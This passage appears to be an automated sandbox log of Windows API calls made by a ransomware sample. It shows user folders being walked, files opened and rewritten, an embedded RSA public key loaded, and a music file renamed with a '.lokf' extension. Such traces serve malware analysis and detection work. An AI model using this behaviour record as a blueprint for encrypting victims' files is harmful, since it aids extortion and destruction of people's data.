returned 1 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b358 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b370 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b340 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b388 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.004] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.004] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b358 | out: hHeap=0x660000) returned 1 [0059.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b358 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b358 | out: hHeap=0x660000) returned 1 [0059.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b388 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b370 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b340 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b328 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82f98 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.006] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0xbafb, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0xbafb, lpOverlapped=0x0) returned 1 [0059.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.007] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbb00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.007] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.007] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.007] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.007] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.007] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.007] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.007] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.007] CloseHandle (hObject=0x5cc) returned 1 [0059.008] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.008] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.008] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32695e0 | out: hHeap=0x660000) returned 1 [0059.008] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YHNtYWD7HeLx42k.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yhntywd7helx42k.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YHNtYWD7HeLx42k.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yhntywd7helx42k.mp3.lokf")) returned 1 [0059.008] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.009] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.009] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.009] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0059.009] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x37d1b3a0, ftLastWriteTime.dwHighDateTime=0x1d4d402, nFileSizeHigh=0x0, nFileSizeLow=0xbb00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3", cAlternateFileName="YHNTYW~1.MP3")) returned 0 [0059.010] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0059.010] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.010] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.010] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82f98 [0059.010] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0059.010] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.010] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.010] PathFindFileNameW (pszPath="") returned="" [0059.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.010] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x37d1b3a0, ftLastWriteTime.dwHighDateTime=0x1d4d402, nFileSizeHigh=0x0, nFileSizeLow=0xbb00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3", cAlternateFileName="YHNTYW~1.MP3")) returned 0xffffffff [0059.011] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x32619a0 [0059.011] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.011] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0059.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82f98 [0059.011] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0059.011] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.011] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.011] PathFindFileNameW (pszPath="") returned="" [0059.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.011] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x37d1b3a0, ftLastWriteTime.dwHighDateTime=0x1d4d402, nFileSizeHigh=0x0, nFileSizeLow=0xbb00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3", cAlternateFileName="YHNTYW~1.MP3")) returned 0xffffffff [0059.011] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x32619a0 [0059.012] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.012] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0059.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82f98 [0059.012] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0059.012] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.012] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.012] PathFindFileNameW (pszPath="") returned="" [0059.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.012] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x741cb10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x741cb10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.012] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x741cb10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x741cb10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.012] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae81c2c0, ftCreationTime.dwHighDateTime=0x1d4ca24, ftLastAccessTime.dwLowDateTime=0xbac96e90, ftLastAccessTime.dwHighDateTime=0x1d4d102, ftLastWriteTime.dwLowDateTime=0xbac96e90, ftLastWriteTime.dwHighDateTime=0x1d4d102, nFileSizeHigh=0x0, nFileSizeLow=0x12e4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="02fNEn45dPvMPAwyDJ.bmp", cAlternateFileName="02FNEN~1.BMP")) returned 1 [0059.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.012] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\02fNEn45dPvMPAwyDJ.bmp") returned=".bmp" [0059.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\02fNEn45dPvMPAwyDJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\02fnen45dpvmpawydj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.013] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=77391) returned 1 [0059.013] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.015] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12e29, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.015] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.016] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.016] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x12e4f, lpOverlapped=0x0) returned 1 [0059.016] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.016] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.016] lstrlenA (lpString="-----BEGIN PUBLIC 